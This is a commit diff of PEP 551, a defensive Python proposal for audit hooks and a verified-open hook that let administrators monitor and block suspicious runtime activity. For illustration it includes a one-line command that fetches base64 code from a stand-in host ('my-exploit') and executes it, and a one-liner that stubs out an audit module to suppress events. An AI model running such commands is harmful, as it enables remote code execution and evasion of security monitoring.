PEP 551 updates (#378)

* Rename "log hooks" to "audit hooks"
Add more hook locations
Improve recommendations regarding open_for_exec()

* Improves hooks for compile, exec, and code.__new__
Adds hook for pickle.find_class

* Fix ordering of code.__new__ arguments to match compile arguments.

* Combine type.__setattr__ event into object.__setattr__ and add __delattr__

* Adds rejected ideas.

* Fixes "from above" reference.
This commit is contained in:
Steve Dower 2017-08-28 16:37:28 -07:00 committed by GitHub
parent b474b4f27f
commit 4f63a5935e
1 changed files with 211 additions and 104 deletions

View File

@ -68,9 +68,9 @@ listed under `Further Reading`_.
Python is a particularly interesting tool for attackers due to its prevalence on
server and developer machines, its ability to execute arbitrary code provided as
data (as opposed to native binaries), and its complete lack of internal logging.
This allows attackers to download, decrypt, and execute malicious code with a
single command::
data (as opposed to native binaries), and its complete lack of internal
auditing. This allows attackers to download, decrypt, and execute malicious code
with a single command::
python -c "import urllib.request, base64; exec(base64.b64decode(urllib.request.urlopen('http://my-exploit/py.b64')).decode())"
@ -108,12 +108,12 @@ Generally, application and system configuration will determine which events
within a scripting engine are worth logging. However, given the value of many
logs events are not recognized until after an attack is detected, it is
important to capture as much as possible and filter views rather than filtering
at the source (see the No Easy Breach video from above). Events that are always
of interest include attempts to bypass event logging, attempts to load and
execute code that is not correctly signed or access-controlled, use of uncommon
operating system functionality such as debugging or inter-process inspection
tools, most network access and DNS resolution, and attempts to create and hide
files or configuration settings on the local machine.
at the source (see the No Easy Breach video from `Further Reading`_). Events
that are always of interest include attempts to bypass auditing, attempts to
load and execute code that is not correctly signed or access-controlled, use of
uncommon operating system functionality such as debugging or inter-process
inspection tools, most network access and DNS resolution, and attempts to create
and hide files or configuration settings on the local machine.
To summarize, defenders have a need to audit specific uses of Python in order to
detect abnormal or malicious usage. Currently, the Python runtime does not
@ -137,9 +137,9 @@ On Linux, some specific features that may be integrated are:
* OpenBSM [10]_
* syslog [11]_
* auditd [12]_
* SELinux labels [13]_
* check execute bit on imported modules
On macOS, some features that may be used with the expanded APIs are:
* OpenBSM [10]_
@ -154,8 +154,8 @@ Overview of Changes
===================
True security transparency is not fully achievable by Python in isolation. The
runtime can log as many events as it likes, but unless the logs are reviewed and
analyzed there is no value. Python may impose restrictions in the name of
runtime can audit as many events as it likes, but unless the logs are reviewed
and analyzed there is no value. Python may impose restrictions in the name of
security, but usability may suffer. Different platforms and environments will
require different implementations of certain security features, and
organizations with the resources to fully customize their runtime should be
@ -164,48 +164,49 @@ encouraged to do so.
The aim of these changes is to enable system administrators to integrate Python
into their existing security systems, without dictating what those systems look
like or how they should behave. We propose two API changes to enable this: an
Event Log Hook and Verified Open Hook. Both are not set by default, and both
require modifying the appropriate entry point to enable any functionality. For
the purposes of validation and example, we propose a new spython/spython.exe
Audit Hook and Verified Open Hook. Both are not set by default, and both require
modifications to the entry point binary to enable any functionality. For the
purposes of validation and example, we propose a new ``spython``/``spython.exe``
entry point program that enables some basic functionality using these hooks.
However, the expectation is that security-conscious organizations will create
their own entry points to meet their needs.
**However, security-conscious organizations are expected to create their own
entry points to meet their own needs.**
Event Log Hook
--------------
Audit Hook
----------
In order to achieve security transparency, an API is required to raise messages
from within certain operations. These operations are typically deep within the
Python runtime or standard library, such as dynamic code compilation, module
imports, DNS resolution, or use of certain modules such as ``ctypes``.
The new APIs required for log hooks are::
The new APIs required for audit hooks are::
# Add a logging hook
sys.addloghook(hook: Callable[str, tuple]) -> None
int PySys_AddLogHook(int (*hook)(const char *event, PyObject *args));
# Add an auditing hook
sys.addaudithook(hook: Callable[str, tuple]) -> None
int PySys_AddAuditHook(int (*hook)(const char *event, PyObject *args));
# Raise an event with all logging hooks
sys.loghook(str, *args) -> None
int PySys_LogHook(const char *event, PyObject *args);
# Raise an event with all auditing hooks
sys.audit(str, *args) -> None
int PySys_Audit(const char *event, PyObject *args);
# Internal API used during Py_Finalize() - not publicly accessible
void _Py_ClearLogHooks(void);
void _Py_ClearAuditHooks(void);
Hooks are added by calling ``PySys_AddLogHook()`` from C at any time, including
before ``Py_Initialize()``, or by calling ``sys.addloghook()`` from Python code.
Hooks are never removed or replaced, and existing hooks have an opportunity to
refuse to allow new hooks to be added (adding a logging hook is logged, and so
preexisting hooks can raise an exception to block the new addition).
Hooks are added by calling ``PySys_AddAuditHook()`` from C at any time,
including before ``Py_Initialize()``, or by calling ``sys.addaudithook()`` from
Python code. Hooks are never removed or replaced, and existing hooks have an
opportunity to refuse to allow new hooks to be added (adding an audit hook is
audited, and so preexisting hooks can raise an exception to block the new
addition).
When events of interest are occurring, code can either call ``PySys_LogHook()``
from C (while the GIL is held) or ``sys.loghook()``. The string argument is the
When events of interest are occurring, code can either call ``PySys_Audit()``
from C (while the GIL is held) or ``sys.audit()``. The string argument is the
name of the event, and the tuple contains arguments. A given event name should
have a fixed schema for arguments, and both arguments are considered a public
API (for a given x.y version of Python), and thus should only change between
feature releases with updated documentation.
When an event is logged, each hook is called in the order it was added with the
When an event is audited, each hook is called in the order it was added with the
event name and tuple. If any hook returns with an exception set, later hooks are
ignored and *in general* the Python runtime should terminate. This is
intentional to allow hook implementations to decide how to respond to any
@ -213,17 +214,17 @@ particular event. The typical responses will be to log the event, abort the
operation with an exception, or to immediately terminate the process with an
operating system exit call.
When an event is logged but no hooks have been set, the ``loghook()`` function
When an event is audited but no hooks have been set, the ``audit()`` function
should include minimal overhead. Ideally, each argument is a reference to
existing data rather than a value calculated just for the logging call.
existing data rather than a value calculated just for the auditing call.
As hooks may be Python objects, they need to be freed during ``Py_Finalize()``.
To do this, we add an internal API ``_Py_ClearLogHooks()`` that releases any
To do this, we add an internal API ``_Py_ClearAuditHooks()`` that releases any
``PyObject*`` hooks that are held, as well as any heap memory used. This is an
internal function with no public export, but it passes an event to all existing
internal function with no public export, but it triggers an event for all audit
hooks to ensure that unexpected calls are logged.
See `Log Hook Locations`_ for proposed log hook points and schemas, and the
See `Audit Hook Locations`_ for proposed audit hook points and schemas, and the
`Recommendations`_ section for discussion on appropriate responses.
Verified Open Hook
@ -267,17 +268,25 @@ Note that these handlers can import and call the ``_io.open()`` function on
CPython without triggering themselves.
If the handler determines that the file is not suitable for execution, it should
raise an exception of its choice, as well as performing any other logging or
notifications.
raise an exception of its choice, as well as raising any other auditing events
or notifications.
All import and execution functionality involving code from a file will be
changed to use ``open_for_exec()`` unconditionally. It is important to note that
calls to ``compile()``, ``exec()`` and ``eval()`` do not go through this
function - a log hook that includes the code from these calls will be added and
is the best opportunity to validate code that is read from the file. Given the
current decoupling between import and execution in Python, most imported code
will go through both ``open_for_exec()`` and the log hook for ``compile``, and
so care should be taken to avoid repeating verification steps.
function - an audit hook that includes the code from these calls will be added
and is the best opportunity to validate code that is read from the file. Given
the current decoupling between import and execution in Python, most imported
code will go through both ``open_for_exec()`` and the log hook for ``compile``,
and so care should be taken to avoid repeating verification steps.
.. note::
The use of ``open_for_exec()`` by ``importlib`` is a valuable first defence,
but should not be relied upon to prevent misuse. In particular, it is easy
to monkeypatch ``importlib`` in order to bypass the call. Auditing hooks are
the primary way to achieve security transparency, and are essential for
detecting
API Availability
----------------
@ -287,45 +296,52 @@ behavior of the functions is implementation specific. The descriptions here
refer to the CPython implementation, and while other implementations should
provide the functions, there is no requirement that they behave the same.
For example, ``sys.addloghook()`` and ``sys.loghook()`` should exist but may do
nothing. This allows code to make calls to ``sys.loghook()`` without having to
For example, ``sys.addaudithook()`` and ``sys.audit()`` should exist but may do
nothing. This allows code to make calls to ``sys.audit()`` without having to
test for existence, but it should not assume that its call will have any effect.
(Including existence tests in security-critical code allows another vector to
bypass logging, so it is preferable that the function always exist.)
bypass auditing, so it is preferable that the function always exist.)
``os.open_for_exec()`` should at a minimum always return ``_io.open(pathlike,
'rb')``. Code using the function should make no further assumptions about what
may occur, and implementations other than CPython are not required to let
developers override the behavior of this function with a hook.
``os.open_for_exec(pathlike)`` should at a minimum always return
``_io.open(pathlike, 'rb')``. Code using the function should make no further
assumptions about what may occur, and implementations other than CPython are not
required to let developers override the behavior of this function with a hook.
Log Hook Locations
==================
Audit Hook Locations
====================
Calls to ``sys.loghook()`` or ``PySys_LogHook()`` will be added to the following
Calls to ``sys.audit()`` or ``PySys_Audit()`` will be added to the following
operations with the schema in Table 1. Unless otherwise specified, the ability
for log hooks to abort any listed operation should be considered part of the
for audit hooks to abort any listed operation should be considered part of the
rationale for including the hook.
.. csv-table:: Table 1: Log Hooks
.. csv-table:: Table 1: Audit Hooks
:header: "API Function", "Event Name", "Arguments", "Rationale"
:widths: 2, 2, 3, 6
``PySys_AddLogHook``, ``sys.addloghook``, "", "Detect when new log hooks are
being added."
``_PySys_ClearLogHooks``, ``sys._clearloghooks``, "", "Notifies hooks they
are being cleaned up, mainly in case the event is triggered unexpectedly.
This event cannot be aborted."
``PySys_AddAuditHook``, ``sys.addaudithook``, "", "Detect when new audit
hooks are being added."
``_PySys_ClearAuditHooks``, ``sys._clearaudithooks``, "", "Notifies hooks
they are being cleaned up, mainly in case the event is triggered
unexpectedly. This event cannot be aborted."
``Py_SetOpenForExecuteHandler``, ``setopenforexecutehandler``, "", "Detects
any attempt to set the ``open_for_execute`` handler."
"``compile``, ``exec``, ``eval``, ``PyAst_CompileString``", ``compile``, "
``(code, filename_or_none)``", "Detect dynamic code compilation. Note that
this will also be called for regular imports of source code, including those
that used ``open_for_exec``."
"``compile``, ``exec``, ``eval``, ``PyAst_CompileString``, ``PyAST_obj2mod``
", ``compile``, "``(code, filename_or_none)``", "Detect dynamic code
compilation, where ``code`` could be a string or AST. Note that this will be
called for regular imports of source code, including those that were opened
with ``open_for_exec``."
"``exec``, ``eval``, ``run_mod``", ``exec``, "``(code_object,)``", "Detect
dynamic execution of code objects. This only occurs for explicit calls, and
is not raised for normal function invocation."
``import``, ``import``, "``(module, filename, sys.path, sys.meta_path,
sys.path_hooks)``", "Detect when modules are imported. This is raised before
the module name is resolved to a file. All arguments other than the module
name may be ``None`` if they are not used or available."
``code_new``, ``code.__new__``, "``(bytecode, filename, name)``", "Detect
dynamic creation of code objects. This only occurs for direct instantiation,
and is not raised for normal compilation."
"``_ctypes.dlopen``, ``_ctypes.LoadLibrary``", ``ctypes.dlopen``, "
``(module_or_path,)``", "Detect when native modules are used."
``_ctypes._FuncPtr``, ``ctypes.dlsym``, "``(lib_object, name)``", "Collect
@ -342,12 +358,12 @@ rationale for including the hook.
trace functions. Because of the implementation, exceptions raised from the
hook will abort the operation, but will not be raised in Python code. Note
that ``threading.setprofile`` eventually calls this function, so the event
will be logged for each thread."
will be audited for each thread."
``PyEval_SetTrace``, ``sys.settrace``, "", "Detect when code is injecting
trace functions. Because of the implementation, exceptions raised from the
hook will abort the operation, but will not be raised in Python code. Note
that ``threading.settrace`` eventually calls this function, so the event
will be logged for each thread."
will be audited for each thread."
``_PyEval_SetAsyncGenFirstiter``, ``sys.set_async_gen_firstiter``, "", "
Detect changes to async generator hooks."
``_PyEval_SetAsyncGenFinalizer``, ``sys.set_async_gen_finalizer``, "", "
@ -379,9 +395,23 @@ rationale for including the hook.
``socket.getservbyport``, ``socket.getservbyport``, "``(port, protocol)``", "
Detect service resolution. The port argument is an int and protocol is a
str."
","
``type.__setattr__``","``(type, attr_name, value)``","Detect monkey patching
of types. This event is only raised when the object is an instance of
``type``."
"``_PyObject_GenericSetAttr``, ``check_set_special_type_attr``,
``object_set_class``",``object.__setattr__``,"``(object, attr, value)``","
Detect monkey patching of objects. This event is raised for the ``__class__``
attribute and any attribute on ``type`` objects."
``_PyObject_GenericSetAttr``,``object.__delattr__``,"``(object, attr)``","
Detect deletion of object attributes. This event is raised for any attribute
on ``type`` objects."
``Unpickler.find_class``,``pickle.find_class``,"``(module_name,
global_name)``","Detect imports and global name lookup when unpickling."
TODO - more hooks in ``_socket``, ``_ssl``, others?
* code objects
* function objects
SPython Entry Point
===================
@ -391,9 +421,9 @@ A new entry point binary will be added, called ``spython.exe`` on Windows and
example, as we expect most users of this functionality to implement their own
entry point and hooks (see `Recommendations`_). It will also be used for tests.
Source builds will create ``spython`` by default, but distributors may choose
whether to include ``spython`` in their pre-built packages. The python.org
managed binary distributions will not include ``spython``.
Source builds will build ``spython`` by default, but distributions should not
include it except as a test binary. The python.org managed binary distributions
will not include ``spython``.
**Do not accept most command-line arguments**
@ -411,32 +441,27 @@ used to initialize ``sys.path`` following the rules currently described `for
Windows <https://docs.python.org/3/using/windows.html#finding-modules>`_.
When built with ``Py_DEBUG``, the ``spython`` entry point will allow a ``-i``
option with no other arguments to enter into interactive mode, with log messages
being written to standard error rather than a file. This is intended for testing
and debugging only.
option with no other arguments to enter into interactive mode, with audit
messages being written to standard error rather than a file. This is intended
for testing and debugging only.
**Log security events to a file**
Before initialization, ``spython`` will set a log hook that writes events to a
local file. By default, this file is the full path of the process with a
Before initialization, ``spython`` will set an audit hook that writes events to
a local file. By default, this file is the full path of the process with a
``.log`` suffix, but may be overridden with the ``SPYTHONLOG`` environment
variable (despite such overrides being explicitly discouraged in
`Recommendations`_).
The log hook will also abort all ``addloghook`` events, preventing any other
hooks from being added.
On Windows, code from ``compile`` events will submitted to AMSI [5]_ and if it
fails to validate, the compile event will be aborted. This can be tested by
calling ``compile()`` or ``eval()`` on the contents of the `EICAR test file
<http://www.eicar.org/86-0-Intended-use.html>`_.
The audit hook will also abort all ``sys.addaudithook`` events, preventing any
other hooks from being added.
**Restrict importable modules**
Also before initialization, ``spython`` will set an open-for-execute hook that
validates all files opened with ``os.open_for_exec``. This implementation will
require all files to have a ``.py`` suffix (thereby blocking the use of cached
bytecode), and will raise a custom log message ``spython.open_for_exec``
bytecode), and will raise a custom audit event ``spython.open_for_exec``
containing ``(filename, True_if_allowed)``.
On Windows, the hook will also open the file with flags that prevent any other
@ -446,6 +471,11 @@ modified between the check and use. Compilation will later trigger a ``compile``
event, so there is no need to read the contents now for AMSI, but other
validation mechanisms such as DeviceGuard [4]_ should be performed here.
**Restrict globals in pickles**
The ``spython`` entry point will abort all ``pickle.find_class`` events that use
the default implementation. Overrides will not raise audit events unless
explicitly added, and so they will continue to be allowed.
Performance Impact
==================
@ -453,7 +483,7 @@ Performance Impact
**TODO**
Full impact analysis still requires investigation. Preliminary testing shows
that calling ``sys.loghook`` with no hooks added does not significantly affect
that calling ``sys.audit`` with no hooks added does not significantly affect
any existing benchmarks, though targeted microbenchmarks can observe an impact.
Performance impact using ``spython`` or with hooks added are not of interest
@ -482,7 +512,7 @@ particular, the entry point **should not** obtain any settings from the current
environment, such as environment variables, unless those settings are otherwise
protected from modification.
Log messages **should not** be written to a local file. The ``spython`` entry
Audit messages **should not** be written to a local file. The ``spython`` entry
point does this for example and testing purposes. On production machines, tools
such as ETW [7]_ or auditd [12]_ that are intended for this purpose should be
used.
@ -491,7 +521,8 @@ The default ``python`` entry point **should not** be deployed to production
machines, but could be given to developers to use and test Python on
non-production machines. Sysadmins **may** consider deploying a less restrictive
version of their entry point to developer machines, since any system connected
to your network is a potential target.
to your network is a potential target. Sysadmins **may** deploy their own entry
point as ``python`` to obscure the fact that extra auditing is being included.
Python deployments **should** be made read-only using any available platform
functionality after deployment and during use.
@ -502,30 +533,38 @@ example, Windows supports embedding signatures in executable files and using
catalogs for others, and can use DeviceGuard [4]_ to validate signatures either
automatically or using an ``open_for_exec`` hook.
Sysadmins **should** collect as many logged events as possible, and **should**
copy them off of local machines frequently. Even if logs are not being
constantly monitored for suspicious activity, once an attack is detected it is
too late to enable logging. Log hooks **should not** attempt to preemptively
filter events, as even benign events are useful when analyzing the progress of
Sysadmins **should** log as many audited events as possible, and **should** copy
logs off of local machines frequently. Even if logs are not being constantly
monitored for suspicious activity, once an attack is detected it is too late to
enable auditing. Audit hooks **should not** attempt to preemptively filter
events, as even benign events are useful when analyzing the progress of
an attack. (Watch the "No Easy Breach" video under `Further Reading`_ for a
deeper look at this side of things.)
Log hooks **should** write events to logs before attempting to abort. As
discussed earlier, it is more important to record malicious actions than to
prevent them.
Most actions **should not** be aborted if they could ever occur during normal
use or if preventing them will encourage attackers to work around them. As
described earlier, awareness is a higher priority than prevention. Sysadmins
**may** audit their Python code and abort operations that are known to never be
used deliberately.
On production machines, the first log hook **should** be set in C code before
``Py_Initialize`` is called, and that hook **should** unconditionally abort the
``sys.addloghook`` event. The Python interface is mainly useful for testing.
Audit hooks **should** write events to logs before attempting to abort. As
discussed earlier, it is more important to record malicious actions than to
prevent them.
To prevent log hooks being added on non-production machines, the entry point
**may** add a log hook that aborts the ``sys.addloghook`` event but otherwise
Sysadmins **should** identify correlations between events, as a change to
correlated events may indicate misuse. For example, module imports will
typically trigger the ``import`` auditing event, followed by an
``open_for_exec`` call and usually a ``compile`` event. Attempts to bypass
auditing will often suppress some but not all of these events. So if the log
contains ``import`` events but not ``compile`` events, investigation may be
necessary.
The first audit hook **should** be set in C code before ``Py_Initialize`` is
called, and that hook **should** unconditionally abort the ``sys.addloghook``
event. The Python interface is primarily intended for testing and development.
To prevent audit hooks being added on non-production machines, an entry point
**may** add an audit hook that aborts the ``sys.addloghook`` event but otherwise
does nothing.
On production machines, a non-validating ``open_for_exec`` hook **may** be set
@ -534,8 +573,74 @@ overriding the hook, however, logging the ``setopenforexecutehandler`` event is
useful since no code should ever need to call it. Using at least the sample
``open_for_exec`` hook implementation from ``spython`` is recommended.
Since ``importlib``'s use of ``open_for_exec`` may be easily bypassed with
monkeypatching, an audit hook **should** be used to detect attribute changes on
type objects.
[TODO: more good advice; less bad advice]
Rejected Ideas
==============
Separate module for audit hooks
-------------------------------
The proposal is to add a new module for audit hooks, hypothetically ``audit``.
This would separate the API and implementation from the ``sys`` module, and
allow naming the C functions ``PyAudit_AddHook`` and ``PyAudit_Audit`` rather
than the current variations.
Any such module would need to be a built-in module that is guaranteed to always
be present. The nature of these hooks is that they must be callable without
condition, as any conditional imports or calls provide more opportunities to
intercept and suppress or modify events.
Given its nature as one of the most core modules, the ``sys`` module is somewhat
protected against module shadowing attacks. Replacing ``sys`` with a
sufficiently functional module that the application can still run is a much more
complicated task than replacing a module with only one function of interest. An
attacker that has the ability to shadow the ``sys`` module is already capable of
running arbitrary code from files, whereas an ``audit`` module can be replaced
with a single statement::
import sys; sys.modules['audit'] = type('audit', (object,), {'audit': lambda *a: None, 'addhook': lambda *a: None})
Multiple layers of protection already exist for monkey patching attacks against
either ``sys`` or ``audit``, but assignments or insertions to ``sys.modules``
are not audited.
This idea is rejected because it makes substituting ``audit`` calls throughout
all callers near trivial.
Flag in sys.flags to indicate "secure" mode
-------------------------------------------
The proposal is to add a value in ``sys.flags`` to indicate when Python is
running in a "secure" mode. This would allow applications to detect when some
features are enabled and modify their behaviour appropriately.
Currently there are no guarantees made about security by this PEP - this section
is the first time the word "secure" has been used. Security **transparency**
does not result in any changed behaviour, so there is no appropriate reason for
applications to modify their behaviour.
Both application-level APIs ``sys.audit`` and ``os.open_for_exec`` are always
present and functional, regardless of whether the regular ``python`` entry point
or some alternative entry point is used. Callers cannot determine whether any
hooks have been added (except by performing side-channel analysis), nor do they
need to. The calls should be fast enough that callers do not need to avoid them,
and the sysadmin is responsible for ensuring their added hooks are fast enough
to not affect application performance.
The argument that this is "security by obscurity" is valid, but irrelevant.
Security by obscurity is only an issue when there are no other protective
mechanisms; obscurity as the first step in avoiding attack is strongly
recommended (see `this article
<https://danielmiessler.com/study/security-by-obscurity/>`_ for discussion).
This idea is rejected because there are no appropriate reasons for an
application to change its behaviour based on whether these APIs are in use.
Further Reading
===============
@ -607,6 +712,8 @@ References
.. [12] `<http://security.blogoverflow.com/2013/01/a-brief-introduction-to-auditd/>`_
.. [13] SELinux access decisions `<http://man7.org/linux/man-pages/man3/avc_entry_ref_init.3.html>`_
Acknowledgments
===============